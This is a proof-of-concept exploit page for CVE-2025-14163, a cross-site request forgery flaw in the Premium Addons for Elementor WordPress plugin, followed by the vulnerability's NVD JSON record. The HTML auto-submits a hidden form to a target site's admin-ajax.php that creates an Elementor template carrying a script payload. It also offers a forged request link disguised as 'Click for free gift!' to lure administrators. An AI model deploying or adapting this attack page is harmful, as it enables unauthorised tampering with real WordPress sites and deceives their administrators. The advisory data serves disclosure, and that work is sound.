CVE-2025-14163

<!-- CSRF PoC for CVE-2025-14163 --> <!-- Exploits missing nonce validation in insert_inner_template function --> <!DOCTYPE html> <html> <head> <title>CSRF Attack - Create Elementor Template</title> </head> <body> <h1>CSRF PoC for CVE-2025-14163</h1> <p>Click the button below to trigger template creation (requires admin interaction)</p> <!-- Auto-submit form --> <form id="csrfForm" action="https://target-site.com/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="premium_addons_insert_inner_template"> <input type="hidden" name="template_name" value="Malicious Template"> <input type="hidden" name="template_content" value="<script>alert('XSS')</script>"> <input type="hidden" name="template_type" value="section"> </form> <script> // Auto-submit after page load document.getElementById('csrfForm').submit(); </script> <p>Or use this link (social engineering):</p> <a href="https://target-site.com/wp-admin/admin-ajax.php?action=premium_addons_insert_inner_template&template_name=Malicious&template_content=<script>alert('XSS')</script>">Click for free gift!</a> </body> </html>

{"cve": {"id": "CVE-2025-14163", "sourceIdentifier": "[email protected]", "published": "2025-12-23T10:15:43.497", "lastModified": "2026-04-08T18:24:08.443", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Premium Addons for Elementor plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.11.53. This is due to missing nonce validation in the 'insert_inner_template' function. This makes it possible for unauthenticated attackers to create arbitrary Elementor templates via a forged request granted they can trick a site administrator or other user with the edit_posts capability into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:leap13:premium_addons_for_elementor:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "4.11.54", "matchCriteriaId": "64CFC13B-0B7D-4AAA-946C-74E74ED44158"}]}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/tags/4.11.53/includes/templates/classes/manager.php#L246", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/tags/4.11.53/includes/templates/classes/manager.php#L40", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/changeset/3416254/", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://research.cleantalk.org/cve-2025-14163/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/77b57f2a-0b46-4b4a-bdca-1c5218d739ce?source=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}